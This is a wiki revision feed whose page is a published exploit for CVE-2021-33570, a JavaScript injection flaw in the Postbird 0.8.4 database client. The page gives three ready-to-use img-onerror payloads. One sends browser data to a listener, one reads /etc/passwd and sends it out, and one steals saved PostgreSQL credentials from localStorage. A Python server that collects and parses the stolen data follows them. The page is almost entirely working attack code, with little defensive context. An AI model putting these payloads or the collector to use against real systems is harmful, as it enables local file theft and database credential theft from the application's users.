https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2021-33570_Postbird_0.8.4_Javascript%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E
CVE-2021-33570 Postbird 0.8.4 Javascript注入漏洞 - Revision history
2026-04-24T13:21:05Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=CVE-2021-33570_Postbird_0.8.4_Javascript%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&diff=3595&oldid=prev
Pwnwiki: Created page with "==EXP== <pre> # Exploit Title: Postbird 0.8.4 - Javascript Injection # Date: [26 May 2021] # Exploit Author: Debshubra Chakraborty # Vendor Homepage: https://github.com/paxa/p..."
2021-05-28T01:19:06Z
<p>Created page with "==EXP== <pre> # Exploit Title: Postbird 0.8.4 - Javascript Injection # Date: [26 May 2021] # Exploit Author: Debshubra Chakraborty # Vendor Homepage: https://github.com/paxa/p..."</p>
<p><b>New page</b></p><div>==EXP==<br />
<pre><br />
# Exploit Title: Postbird 0.8.4 - Javascript Injection<br />
# Date: [26 May 2021]<br />
# Exploit Author: Debshubra Chakraborty<br />
# Vendor Homepage: https://github.com/paxa/postbird<br />
# Software Link: https://www.electronjs.org/apps/postbird<br />
# Version: 0.8.4 <br />
# Tested on: Linux<br />
# CVE : CVE-2021-33570<br />
<br />
"""<br />
XSS Payload<br />
<img src="" onerror="var xhttp = new XMLHttpRequest();xhttp.open('GET', 'http://127.0.0.1 :5555/?xss='+JSON.stringify(navigator.appVersion), true);xhttp.send();"><br />
<br />
LFI Payload<br />
<img src="" onerror="var xhttp = new XMLHttpRequest();xhttp.open('GET', 'file:///etc/passwd', false);xhttp.send();var res = xhttp.response;xhttp.open('GET', 'http://127.0.0.1 :5555/?file='+JSON.stringify(res), true);xhttp.send();"><br />
<br />
PostgreSQL Password Stealing Payload<br />
<img src="" onerror="var xhttp = new XMLHttpRequest();xhttp.open('GET', 'http://127.0.0.1 :5555/?credentials='+window.localStorage.savedConnections, true);xhttp.send();"><br />
<br />
"""<br />
<br />
from http.server import BaseHTTPRequestHandler, HTTPServer<br />
import urllib.parse<br />
import re<br />
<br />
hostName = '0.0.0.0'<br />
serverPort = 5555<br />
<br />
class MyServer(BaseHTTPRequestHandler):<br />
def do_GET(self):<br />
self.send_response(200)<br />
parse(urllib.parse.unquote(self.requestline))<br />
<br />
def log_message(self, format, *args):<br />
return <br />
<br />
<br />
def parse(data):<br />
expression = re.search('\S+=', data)<br />
attr = expression.group()<br />
<br />
if attr[2:len(attr)-1] == 'file':<br />
data = data[12:len(data)-11] <br />
data = data.rsplit('\\n')<br />
print(f'\n[+] File received from LFI: \n\n')<br />
for output in data:<br />
print(output)<br />
<br />
elif attr[2:len(attr)-1] == 'xss':<br />
data = data[11:len(data)-10]<br />
print(f'\n[+] Data exfiltration from Stored XSS: \n\n{data}')<br />
<br />
elif attr[2:len(attr)-1] == 'credentials':<br />
pos = re.search('{"\S+:', data)<br />
data = data[pos.start():len(data)-11]<br />
for i in range(2, len(data), 1):<br />
if data[i] == '"':<br />
pos = i<br />
break<br />
<br />
host = data[2:pos]<br />
data = data[14:]<br />
data = data.rsplit(',')<br />
print(f'\n\n[+] The Database credentials received\n\nHost = {host}')<br />
for output in data:<br />
print(output)<br />
<br />
else:<br />
print(f'\n\n[-] Unknown header attribute found, atribute = {attr[2:len(attr)-1]}')<br />
<br />
<br />
def main(): <br />
global hostName, serverPort<br />
webServer = HTTPServer((hostName, serverPort), MyServer)<br />
print("Server started http://%s:%s" % (hostName, serverPort))<br />
<br />
try:<br />
webServer.serve_forever()<br />
<br />
except KeyboardInterrupt:<br />
pass<br />
<br />
webServer.server_close()<br />
print("\nServer stopped.")<br />
<br />
<br />
if __name__ == "__main__":<br />
main()<br />
</pre></div>
Pwnwiki